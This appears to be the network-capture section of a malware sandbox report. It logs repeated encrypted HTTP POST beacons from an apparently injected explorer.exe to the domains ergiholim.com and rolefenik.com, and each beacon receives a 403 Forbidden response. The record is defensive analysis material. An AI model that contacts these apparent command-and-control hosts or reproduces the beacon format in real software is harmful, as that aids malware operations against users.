Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:21:56 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:56 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:57 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:57 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8x9n4JZicwJdQHhf44iZq62bQR4PclbBYS0htN0z0UmCSMSHiqp2QJ4PjYCKKEj5xA3y%2BznPyo7blneijvou0nJg8laRd2zTyoIYi1rSovLNVoukMKJ3Gf%2Bvvs5%2BRK5h"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070eb2e12deb5-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=130660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=22172&cwnd=32&unsent_bytes=0&cid=f28166e97db29f7b&ts=668&x=0"
                                                                                                                                          2024-11-13 17:21:57 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          13 | 192.168.2.6 | 50003 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:21:58 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:58 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:59 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:59 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TMaY3Vd5xWzms0rNmLkSR80nBpc8uNQbOBXENpzh4PsVuG9NKeyli6BcFwKQWmf3mLGSAbNJ%2BeMUoIu9I%2BET5sEZWs9C1u5paPlZP%2Bx%2BQE4%2FhKeMzruVobkNwNui1coO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070f55841ca1f-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=160357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20599&cwnd=32&unsent_bytes=0&cid=0a46d277ad3e968c&ts=742&x=0"
                                                                                                                                          2024-11-13 17:21:59 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          14 | 192.168.2.6 | 50004 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:21:59 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:59 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:00 UTC | 751 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:00 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQD624mIiNghgpFyZzAJprJzLc%2FnDTRsb%2F9vcol2RdUwLvH1obq%2F2iNyGPlpoANo9JUvTVepMdcZuMUyJha%2FxnNBAUhibILuNXTSjsT4a2fwkn5kJXMW%2BiELaIrFARHN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070fe6846c9ac-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=39041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=74193&cwnd=32&unsent_bytes=0&cid=2777bdb7e1b369c5&ts=279&x=0"
                                                                                                                                          2024-11-13 17:22:00 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          15 | 192.168.2.6 | 50005 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:00 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:00 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:01 UTC | 753 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:01 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GL2Q%2FbhasOF6DcdYDAG22sB6BgF7M1fiSewuc5IKjkh720Apo6m72liNiuOrGCtTwEKZTRgw3k2zrRV%2Fnasdf1DHW0tE%2Bx%2BJ%2BKIbjEoULnDAIcmci%2FmwoNyMzwLjmhtr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2071049970c958-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=41232&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=70258&cwnd=32&unsent_bytes=0&cid=c2dd190e565dc61d&ts=278&x=0"
                                                                                                                                          2024-11-13 17:22:01 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:22:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                          16 | 192.168.2.6 | 50006 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:22:01 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:22:01 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:02 UTC | 747 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:02 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1r2nLgGaylcA0qilBncljS4QWx9udQXuiUu0umAnEBz8XwZLVHWX2w%2FByQfOFetFPg95t7b9vT3QEp8XEvQQsnV4OH76bKcvhibOFumd2xbFh0zFM9%2FL5QL50bTapSIG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20710a29e56c6f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1121&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=2623188&cwnd=251&unsent_bytes=0&cid=c8c2661e3f37bc44&ts=434&x=0"
2024-11-13 17:22:02 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.6 | 50007 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:02 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:02 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:03 UTC | 745 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kf6QbVzs01IjXub4ChxAKfDqBBewWhxpj0OU4jKpQURmVJpn%2FkeNDPTSkJ5WYbRWttQkV2j4W7SFGjaaxTjmDMpibkjGIzNHqoLpOIQ081l8i8qbbyZHDqzmX7ishTPl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207110ae07e9bd-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1386&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1937123&cwnd=251&unsent_bytes=0&cid=2093097d31608b02&ts=397&x=0"
2024-11-13 17:22:03 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.6 | 50008 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:04 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:04 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:04 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:04 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3fn6QlD2ADnShiWkE7w%2BJgQac5zJ%2BB6rhtjX0EQfbKg2CxsmZjEIDRBGDtgykuPhApt6AecT3sXIMu8UticN5FHLEAbb78PBgAa1vUAN3SE9AloGRkEJc1%2B9KsAhO4N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20711a8cf3e391-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137358&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20796&cwnd=32&unsent_bytes=0&cid=91d7355ee9d871b5&ts=679&x=0"
2024-11-13 17:22:04 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.6 | 50010 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:06 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:06 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:07 UTC | 745 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:07 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJVKZW4WVYHSwB3cEEmLlOaCV0NZl%2F207pk4vzqookWLiCiuoS3tVCo81D9CazJPEQWgAioJCt4bpFvoKO99GOCXYfupemqmmIhRmo89yzWRJATKduvwPjTzHtguyxXl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207128add6f6c1-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=129983&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=22284&cwnd=32&unsent_bytes=0&cid=aba79aad9062ef68&ts=1523&x=0"
2024-11-13 17:22:07 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:07 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.6 | 50011 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:08 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:08 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:22:09 UTC | 750 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:08 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IB5NDGGVo3QHHbPb3wYUOOJsJ7BntS7XQYNbHsQOlk9FJnD0bNMKpm%2BZ0RliYCh2bvZqyFBityTt2PBaLHwnpGIZPxhrFncE%2F13DBsEx2%2FDl5osV8T9uSV2E2g%2Bc071z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207132da6a736e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=144636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20037&cwnd=32&unsent_bytes=0&cid=333774c6181703ba&ts=806&x=0"
2024-11-13 17:22:09 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:09 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50012 | 104.21.92.105 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:09 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:22:09 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:22:10 UTC753INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:22:10 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z3k%2FFgQG5RN8Zh34Ryei8ARZBOyZpwKDrnJe07HXlaZUkY5rC25aLsW85I65t%2FzBNiO03ASrrnlNMavmXKlagT5f%2BT4XrRVK6btd9vXeMJ7%2BUENpagHji1%2FoNm0IeM0N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20713bae1728e8-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=2258970&cwnd=241&unsent_bytes=0&cid=b9f830ac4404c89f&ts=412&x=0"
2024-11-13 17:22:10 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:22:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50013 | 104.21.15.162 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:22:11 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
